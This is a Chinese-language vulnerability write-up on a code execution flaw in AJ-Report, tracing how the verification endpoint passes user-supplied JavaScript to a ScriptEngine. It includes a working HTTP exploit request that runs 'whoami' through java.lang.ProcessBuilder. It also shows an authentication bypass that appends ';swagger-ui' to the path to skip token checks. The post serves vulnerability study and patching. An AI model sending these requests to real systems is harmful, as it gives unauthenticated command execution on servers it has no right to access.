AJ-Report代码执行漏洞分析

转载个人公众号

AJ-Report代码执行漏洞分析

AJ-Report是全开源的一个BI平台,DataSetParamControllerverification方法未对传入的参数进行过滤,可以执行JavaScript函数,导致命令执行漏洞。

环境搭建

将源码下并使用IDEA打开

git clone https://gitee.com/anji-plus/report.git

image-20240504154116752

配置mysql

创建数据 aj_report ,数据库sql文件在resources/db.migration 目录下

image-20240504154241700

配置文件存储路径

image-20240504154329937

漏洞复现

  1. POST /dataSetParam/verification;swagger-ui/ HTTP/1.1  
  2. Host: 192.168.0.100:9095  
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36  
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7  
  5. Accept-Encoding: gzip, deflate, br  
  6. Accept-Language: zh-CN,zh;q=0.9  
  7. Content-Type: application/json;charset=UTF-8  
  8. Connection: close  
  9.   
  10. {"sampleItem":"1","validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\\"whoami\\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

image-20240504155259256

image-20240504155319624

代码分析

漏洞路径

\report\report-core\src\main\java\com\anjiplus\template\gaea\business\modules\datasetparam\controller\DataSetParamController.java

verification

  1.     @PostMapping("/verification")  
  2.     public ResponseBean verification(@Validated @RequestBody DataSetParamValidationParam param) {  
  3.         DataSetParamDto dto \= new DataSetParamDto();  
  4.         dto.setSampleItem(param.getSampleItem());  
  5.         dto.setValidationRules(param.getValidationRules());  
  6.         return responseSuccessWithData(dataSetParamService.verification(dto));  
  7.     }

param 接受传入的值

  1. @Data  
  2. public class DataSetParamValidationParam implements Serializable {  
  3.   
  4.     /\*\* 参数示例项 \*/  
  5.     @NotBlank(message \= "sampleItem not empty")  
  6.     private String sampleItem;  
  7.   
  8.   
  9.     /\*\* js校验字段值规则,满足校验返回 true \*/  
  10.     @NotBlank(message \= "validationRules not empty")  
  11.     private String validationRules;  
  12. }

需要接受的参数 sampleItemvalidationRules

并将这个参数传入dataSetParamService.verification(dto)

image-20240504155856186

DataSetParamServiceImpl.java

该类中实现了 verification 方法

  2. package com.anjiplus.template.gaea.business.modules.datasetparam.service.impl;  
  3.   
  4. import com.anji.plus.gaea.curd.mapper.GaeaBaseMapper;  
  5. import com.anji.plus.gaea.exception.BusinessExceptionBuilder;  
  6. import com.anjiplus.template.gaea.business.modules.datasetparam.controller.dto.DataSetParamDto;  
  7. import com.anjiplus.template.gaea.business.modules.datasetparam.dao.DataSetParamMapper;  
  8. import com.anjiplus.template.gaea.business.modules.datasetparam.dao.entity.DataSetParam;  
  9. import com.anjiplus.template.gaea.business.modules.datasetparam.service.DataSetParamService;  
  10. import com.anjiplus.template.gaea.business.modules.datasetparam.util.ParamsResolverHelper;  
  11. import com.anjiplus.template.gaea.business.code.ResponseCode;  
  12. import com.fasterxml.jackson.databind.ObjectMapper;  
  13. import lombok.extern.slf4j.Slf4j;  
  14. import org.apache.commons.lang3.StringUtils;  
  15. import org.springframework.beans.factory.annotation.Autowired;  
  16. import org.springframework.stereotype.Service;  
  17.   
  18. import javax.script.Invocable;  
  19. import javax.script.ScriptEngine;  
  20. import javax.script.ScriptEngineManager;  
  21. import java.util.HashMap;  
  22. import java.util.List;  
  23. import java.util.Map;  
  24.   
  25. /\*\*  
  26. \* @desc DataSetParam 数据集动态参数服务实现  
  27. \* @author Raod  
  28. \* @date 2021-03-18 12:12:33.108033200  
  29. \*\*/  
  30. @Service  
  31. //@RequiredArgsConstructor  
  32. @Slf4j  
  33. public class DataSetParamServiceImpl implements DataSetParamService {  
  34.   
  35.     private ScriptEngine engine;  
  36.     {  
  37.         ScriptEngineManager manager \= new ScriptEngineManager();  
  38.         engine \= manager.getEngineByName("JavaScript");  
  39.     }  
  40.   
  41.     @Autowired  
  42.     private DataSetParamMapper dataSetParamMapper;  
  43.   
  44.     @Override  
  45.     public GaeaBaseMapper<DataSetParam\> getMapper() {  
  46.       return dataSetParamMapper;  
  47.     }  
  48.   
  49.     /\*\*  
  50.      \* 参数替换  
  51.      \*  
  52.      \* @param contextData  
  53.      \* @param dynSentence  
  54.      \* @return  
  55.      \*/  
  56.     @Override  
  57.     public String transform(Map<String, Object\> contextData, String dynSentence) {  
  58.         if (StringUtils.isBlank(dynSentence)) {  
  59.             return dynSentence;  
  60.         }  
  61.         if (dynSentence.contains("${")) {  
  62.             dynSentence \= ParamsResolverHelper.resolveParams(contextData, dynSentence);  
  63.         }  
  64.         if (dynSentence.contains("${")) {  
  65.             throw BusinessExceptionBuilder.build(ResponseCode.INCOMPLETE\_PARAMETER\_REPLACEMENT\_VALUES, dynSentence);  
  66.         }  
  67.         return dynSentence;  
  68.     }  
  69.   
  70.     /\*\*  
  71.      \* 参数替换  
  72.      \*  
  73.      \* @param dataSetParamDtoList  
  74.      \* @param dynSentence  
  75.      \* @return  
  76.      \*/  
  77.     @Override  
  78.     public String transform(List<DataSetParamDto\> dataSetParamDtoList, String dynSentence) {  
  79.         Map<String, Object\> contextData \= new HashMap<>();  
  80.         if (null \== dataSetParamDtoList || dataSetParamDtoList.size() <= 0) {  
  81.             return dynSentence;  
  82.         }  
  83.         dataSetParamDtoList.forEach(dataSetParamDto \-> {  
  84.             contextData.put(dataSetParamDto.getParamName(), dataSetParamDto.getSampleItem());  
  85.         });  
  86.         return transform(contextData, dynSentence);  
  87.     }  
  88.   
  89.     /\*\*  
  90.      \* 参数校验  js脚本  
  91.      \*  
  92.      \* @param dataSetParamDto  
  93.      \* @return  
  94.      \*/  
  95.     @Override  
  96.     public Object verification(DataSetParamDto dataSetParamDto) {  
  97.   
  98.         String validationRules \= dataSetParamDto.getValidationRules();  
  99.         if (StringUtils.isNotBlank(validationRules)) {  
  100.             try {  
  101.                 engine.eval(validationRules);  
  102.                 if(engine instanceof Invocable){  
  103.                     Invocable invocable \= (Invocable) engine;  
  104.                     Object exec \= invocable.invokeFunction("verification", dataSetParamDto);  
  105.                     ObjectMapper objectMapper \= new ObjectMapper();  
  106.                     if (exec instanceof Boolean) {  
  107.                         return objectMapper.convertValue(exec, Boolean.class);  
  108.                     }else {  
  109.                         return objectMapper.convertValue(exec, String.class);  
  110.                     }  
  111.   
  112.                 }  
  113.   
  114.             } catch (Exception ex) {  
  115.                 throw BusinessExceptionBuilder.build(ResponseCode.EXECUTE\_JS\_ERROR, ex.getMessage());  
  116.             }  
  117.   
  118.         }  
  119.         return true;  
  120.     }  
  121.   
  122.     /\*\*  
  123.      \* 参数校验  js脚本  
  124.      \*  
  125.      \* @param dataSetParamDtoList  
  126.      \* @return  
  127.      \*/  
  128.     @Override  
  129.     public boolean verification(List<DataSetParamDto\> dataSetParamDtoList, Map<String, Object\> contextData) {  
  130.         if (null \== dataSetParamDtoList || dataSetParamDtoList.size() \== 0) {  
  131.             return true;  
  132.         }  
  133.   
  134.         for (DataSetParamDto dataSetParamDto : dataSetParamDtoList) {  
  135.             if (null != contextData) {  
  136.                 String value \= contextData.getOrDefault(dataSetParamDto.getParamName(), "").toString();  
  137.                 dataSetParamDto.setSampleItem(value);  
  138.             }  
  139.   
  140.             Object verification \= verification(dataSetParamDto);  
  141.             if (verification instanceof Boolean) {  
  142.                 if (!(Boolean) verification) {  
  143.                     return false;  
  144.                 }  
  145.             }else {  
  146.                 //将得到的值重新赋值给contextData  
  147.                 if (null != contextData) {  
  148.                     contextData.put(dataSetParamDto.getParamName(), verification);  
  149.                 }  
  150.                 dataSetParamDto.setSampleItem(verification.toString());  
  151.             }  
  152.   
  153.         }  
  154.         return true;  
  155.     }  
  156.   
  157. }
verification
  1.    @Override  
  2.     public Object verification(DataSetParamDto dataSetParamDto) {  
  3.   
  4.         String validationRules \= dataSetParamDto.getValidationRules();  
  5.         if (StringUtils.isNotBlank(validationRules)) {  
  6.             try {  
  7.                 engine.eval(validationRules);  
  8.                 if(engine instanceof Invocable){  
  9.                     Invocable invocable \= (Invocable) engine;  
  10.                     Object exec \= invocable.invokeFunction("verification", dataSetParamDto);  
  11.                     ObjectMapper objectMapper \= new ObjectMapper();  
  12.                     if (exec instanceof Boolean) {  
  13.                         return objectMapper.convertValue(exec, Boolean.class);  
  14.                     }else {  
  15.                         return objectMapper.convertValue(exec, String.class);  
  16.                     }  
  17.   
  18.                 }  
  19.   
  20.             } catch (Exception ex) {  
  21.                 throw BusinessExceptionBuilder.build(ResponseCode.EXECUTE\_JS\_ERROR, ex.getMessage());  
  22.             }  
  23.   
  24.         }  
  25.         return true;  
  26.     }
  1.     private ScriptEngine engine;  
  2.     {  
  3.         ScriptEngineManager manager \= new ScriptEngineManager();  
  4.         engine \= manager.getEngineByName("JavaScript");  
  5.     }

engine.eval(validationRules): 这行代码使用了一个 engineScriptEngine 的一个实例,来执行传入的 validationRules 字符串,即执行一段 JavaScript 代码。

if(engine instanceof Invocable) 这里检查 engine 是否是 Invocable 接口的实例,如果是,表示这个引擎可以调用 JavaScript 函数。

invocable.invokeFunction("verification", dataSetParamDto): 如果引擎可以调用,就调用名为 "verification" 的 JavaScript 函数,并传入一个 dataSetParamDto 对象作为参数。

ObjectMapper objectMapper = new ObjectMapper(): 创建了一个ObjectMapper对象,用于处理 JSON 数据。

  1.  if (exec instanceof Boolean) {  
  2.     return objectMapper.convertValue(exec, Boolean.class);  
  3.   }else {  
  4.      return objectMapper.convertValue(exec, String.class);  
  5.  }

根据 exec 对象的类型进行处理,如果是布尔类型,则将其转换为 Java 中的 Boolean 类型;否则转换为 String 类型。

return objectMapper.convertValue(...): 最后,根据 exec 的类型,使用 ObjectMapper 将其转换成相应的 Java 类型,并返回结果。

debug 调试

下断点

image-20240504161034272

validationRules 值为JavaScript 代码

调用了ScriptEngineManager eval执行JavaScript 代码

image-20240504161337300

权限验证

正常访问 /dataSetParam/verification 路由是需要token验证

image-20240504162128661

搜索 The Token has expired

image-20240504162204818

TokenFilter.java

TokenFilter拦截器中,放行swagger-uiswagger-resources

  1. if (uri.contains("swagger-ui") || uri.contains("swagger-resources")) {  
  2.     filterChain.doFilter(request, response);  
  3.     return;  
  4. }

image-20240504162300629

使用URL截断绕过 ;

swagger-uiswagger-resources

  1. POST /dataSetParam/verification;swagger-ui HTTP/1.1  
  3. POST /dataSetParam/verification;swagger-resources HTTP/1.1

image-20240504163359548

image-20240504163422237

image-20240504163434179

总结

  • verification方法传入参数validationRules,调用了ScriptEngineManager eval执行JavaScript 代码,导致的代码执行漏洞。
  • 使用; 绕过鉴权
  • 发表于 2024-05-15 10:00:02
  • 阅读 ( 15515 )
  • 分类:漏洞分析

0 条评论

webqs
webqs

3 篇文章

webqs

如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!

站长统计